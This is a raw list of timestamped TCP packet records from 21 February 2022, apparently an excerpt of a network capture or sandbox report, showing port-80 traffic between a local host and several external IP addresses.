                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.223997116 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224092007 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224150896 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224162102 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224170923 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224258900 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224277020 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224293947 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224306107 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224318027 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224329948 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224342108 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224354029 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224380970 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224391937 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224404097 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224406004 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224419117 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224569082 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224585056 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224585056 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224596024 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224608898 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224620104 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224632978 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224791050 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.224970102 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231167078 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231264114 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231343031 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231436968 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231518030 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.231741905 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238049030 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238488913 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238672018 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.238841057 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.246045113 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.253011942 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300225973 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300281048 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300673962 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300692081 CET4981880192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.310280085 CET804981834.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353749990 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353853941 CET804981734.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353955030 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353972912 CET4981780192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.357784033 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.382481098 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.382730961 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384748936 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384826899 CET4982780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.385126114 CET4982880192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409534931 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409580946 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409672022 CET804982735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.748821974 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.748917103 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.748964071 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.748994112 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.749172926 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.749360085 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.937966108 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938219070 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938251972 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938407898 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938622952 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938818932 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.938882113 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939088106 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939212084 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939343929 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939488888 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939539909 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939574003 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939722061 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939776897 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939820051 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.939899921 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940078020 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940186024 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940234900 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940249920 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940366983 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940429926 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940512896 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940557957 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940603018 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940782070 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940903902 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940948009 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.940958023 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941008091 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941236019 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941272974 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941488981 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941821098 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.941857100 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.128501892 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.128582954 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.128622055 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.129456997 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.129514933 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.129611015 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.130326986 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.130408049 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.130448103 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.130971909 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.131048918 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.131088018 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.131396055 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:14.131448984 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.537400961 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.551234007 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.551552057 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553345919 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553399086 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553451061 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553607941 CET4983680192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553648949 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.565282106 CET804983695.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.565768957 CET4983680192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.565838099 CET4983680192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567099094 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567152023 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567190886 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567300081 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567347050 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567393064 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567481995 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567532063 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567565918 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567647934 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567665100 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567734957 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567826986 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567876101 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.576941967 CET804983695.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.577024937 CET804983695.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.577063084 CET804983695.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.577435017 CET4983680192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.577492952 CET4983680192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.581406116 CET804983595.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.581584930 CET4983580192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.588471889 CET804983695.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.583755970 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.740801096 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.741051912 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.744302988 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.744411945 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.901575089 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.901639938 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.379437923 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.380901098 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.381989956 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.382852077 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.497716904 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.497787952 CET804983966.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.498132944 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.754095078 CET4983980192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.754445076 CET4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.911329031 CET804984066.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.911577940 CET4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:25.911765099 CET4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:26.068532944 CET804984066.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:26.128814936 CET804984066.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:26.128886938 CET804984066.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:26.129635096 CET4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:27.925560951 CET4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              Feb 21, 2022 16:55:28.082339048 CET804984066.29.154.157192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.985479116 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.995521069 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.995743990 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999233961 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999286890 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999335051 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:32.999686956 CET4984280192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.008147001 CET8049842142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.008390903 CET4984280192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.008661985 CET4984280192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009416103 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009480953 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009516954 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009547949 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009669065 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009676933 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009738922 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009780884 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009951115 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.009963036 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010040045 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010083914 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010135889 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010143042 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010188103 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010318041 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.010499001 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.016563892 CET8049842142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.019876003 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.019953966 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020100117 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020145893 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020193100 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020339012 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020417929 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020458937 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020502090 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020550966 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020653963 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020693064 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020750046 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020891905 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020930052 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.020966053 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021003008 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021037102 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021074057 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021122932 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021130085 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021178961 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021210909 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021240950 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021275043 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021409988 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021457911 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021470070 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021532059 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021626949 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.021832943 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030190945 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030458927 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030508041 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030596972 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030662060 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.030833006 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031009912 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031379938 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031419039 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031469107 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031596899 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031744003 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031755924 CET4984180192.168.11.20142.250.186.51
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031812906 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031878948 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.031912088 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.032015085 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.032056093 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:33.032116890 CET8049841142.250.186.51192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209398031 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209454060 CET4984480192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209471941 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209496021 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209745884 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226002932 CET804984391.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226078033 CET804984491.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226113081 CET804984391.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226243973 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226309061 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226377010 CET804984391.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226428986 CET804984491.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226463079 CET804984491.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226495981 CET804984391.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226537943 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226671934 CET4984380192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226730108 CET4984480192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226778984 CET4984480192.168.11.2091.184.31.217
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.243388891 CET804984491.184.31.217192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.280808926 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.382738113 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.382934093 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.389020920 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.389100075 CET4984580192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.389317036 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.487112999 CET8049846185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.487313032 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.487391949 CET4984680192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493118048 CET8049845185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493161917 CET8049845185.190.39.52192.168.11.20
